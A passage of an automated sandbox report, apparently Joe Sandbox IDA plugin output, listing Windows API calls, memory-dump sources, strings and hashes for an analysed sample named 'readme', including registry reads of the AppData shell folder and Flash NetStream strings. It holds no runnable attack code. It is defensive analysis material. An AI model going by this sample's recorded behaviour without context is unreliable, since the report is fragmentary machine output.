                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                          • API String ID: 2978645861-761530088
                                                                                                                                                                                                          • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                          • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DestroyWindow
                                                                                                                                                                                                          • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                          • API String ID: 3375834691-1928458085
                                                                                                                                                                                                          • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                          • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3087884050-0
                                                                                                                                                                                                          • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                          • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                          • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 3944000476-502054578
                                                                                                                                                                                                          • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                          • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                          • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                          • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsDevice$Start
                                                                                                                                                                                                          • String ID: portrait
                                                                                                                                                                                                          • API String ID: 1738886688-2504013051
                                                                                                                                                                                                          • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                          • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                          • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4022644143-0
                                                                                                                                                                                                          • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                          • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                          • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                          • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                          • API String ID: 2943255653-4242577526
                                                                                                                                                                                                          • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                          • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                          • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
